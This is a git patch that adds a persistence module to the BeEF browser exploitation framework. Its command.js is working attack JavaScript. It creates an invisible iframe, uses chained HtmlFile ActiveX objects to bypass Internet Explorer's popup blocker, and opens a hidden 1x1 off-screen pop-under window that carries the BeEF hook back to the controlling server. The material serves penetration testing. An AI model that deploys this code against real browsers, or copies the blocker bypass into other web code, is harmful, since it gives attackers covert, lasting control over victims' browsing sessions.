From 1dfc03e6e71dba9a59a70f9868dc709f53885f72 Mon Sep 17 00:00:00 2001 From: Brendan Coles Date: Sat, 20 May 2017 14:18:35 +0000 Subject: [PATCH] Add popunder persistence module with popup blocker bypass for IE --- .../persistence/popunder_window_ie/command.js | 36 +++++++++++++++++++ .../popunder_window_ie/config.yaml | 20 +++++++++++ .../persistence/popunder_window_ie/module.rb | 10 ++++++ 3 files changed, 66 insertions(+) create mode 100644 modules/persistence/popunder_window_ie/command.js create mode 100644 modules/persistence/popunder_window_ie/config.yaml create mode 100644 modules/persistence/popunder_window_ie/module.rb diff --git a/modules/persistence/popunder_window_ie/command.js b/modules/persistence/popunder_window_ie/command.js new file mode 100644 index 000000000..b7d94757d --- /dev/null +++ b/modules/persistence/popunder_window_ie/command.js @@ -0,0 +1,36 @@ +// +// Copyright (c) 2006-2017 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission +// + +beef.execute(function() { + var popunder_url = beef.net.httpproto + '://' + beef.net.host + ':' + beef.net.port + '/demos/plain.html'; + var popunder_name = Math.random().toString(36).substring(2,10); + var iframe_name = Math.random().toString(36).substring(2,10); + + // Create iframe + var popunder_<%= @command_id %> = beef.dom.createInvisibleIframe(); + popunder_<%= @command_id %>.name = iframe_name; + popunder_<%= @command_id %>.id = iframe_name; + + // Create an HtmlFile from an IFrame + var ax1 = new window[iframe_name].ActiveXObject("HtmlFile"); + + // Destroy the contents of the IFrame, while keeping ax1 alive + // because we have a reference to it outside the IFrame itself. + window[iframe_name].document.open().close(); + + // Initialize the HtmlFile + ax1.open().close(); + + // Create a new htmlFile inside the previous one + var ax2 = new ax1.Script.ActiveXObject("HtmlFile"); + ax2.open().close(); + + // Launch popup + beef.debug("[PopUnder Window (IE)] Creating window '" + popunder_name + "' for '" + popunder_url + "'"); + ax2.Script.open(popunder_url, popunder_name, 'toolbar=0,location=0,directories=0,status=0,menubar=0,scrollbars=0,resizable=0,width=1,height=1,left=' + screen.width + ',top=' + screen.height).blur(); + window.focus(); + beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Pop-under window requested'); +}); diff --git a/modules/persistence/popunder_window_ie/config.yaml b/modules/persistence/popunder_window_ie/config.yaml new file mode 100644 index 000000000..cc6f246c4 --- /dev/null +++ b/modules/persistence/popunder_window_ie/config.yaml @@ -0,0 +1,20 @@ +# +# Copyright (c) 2006-2017 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +beef: + module: + popunder_window_ie: + enable: true + category: "Persistence" + name: "Create Pop Under (IE)" + description: "This module uses a HTMLFile ActiveX object to bypass the popup blocker and create a popunder window containing a BeEF hook. Internet Explorer only.

Based on PoC by @MagicMac2000." + authors: ["bcoles", "ethicalhack3r", "@MagicMac2000"] + target: + user_notify: + IE: + min_ver: 11 + max_ver: latest + not_working: ["All"] + diff --git a/modules/persistence/popunder_window_ie/module.rb b/modules/persistence/popunder_window_ie/module.rb new file mode 100644 index 000000000..4160c57af --- /dev/null +++ b/modules/persistence/popunder_window_ie/module.rb @@ -0,0 +1,10 @@ +# +# Copyright (c) 2006-2017 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +class Popunder_window_ie < BeEF::Core::Command + def post_execute + save({'result' => @datastore['result']}) + end +end